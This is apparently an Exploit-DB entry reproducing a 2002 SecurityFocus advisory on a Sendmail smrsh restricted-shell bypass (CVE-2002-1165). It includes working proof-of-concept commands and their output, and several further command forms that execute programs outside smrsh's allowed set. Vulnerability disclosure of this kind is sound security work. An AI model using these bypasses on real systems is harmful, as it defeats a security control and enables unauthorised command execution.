Sendmail 8.12.x - SMRSH Double Pipe Access Validation

Author: zen-parse
type: local
platform: unix
port: 
date_added: 2002-10-01  
date_updated: 2012-10-10  
verified: 1  
codes: CVE-2002-1165;OSVDB-9305  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 21884.txt  
source: https://www.securityfocus.com/bid/5845/info

Sendmail is a freely available, open source mail transport agent. It is maintained and distributed by the Sendmail Consortium. Sendmail is available for the Unix and Linux operating systems.

smrsh is designed to prevent the execution of commands outside of the restricted environment. However, when commands are entered using either double pipes (||) or a mixture of dot (.) and slash (/) characters, a user may be able to bypass the checks performed by smrsh. This could lead to the execution of commands outside of the restricted environment.

$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute

OR one of the following types of commands:

smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"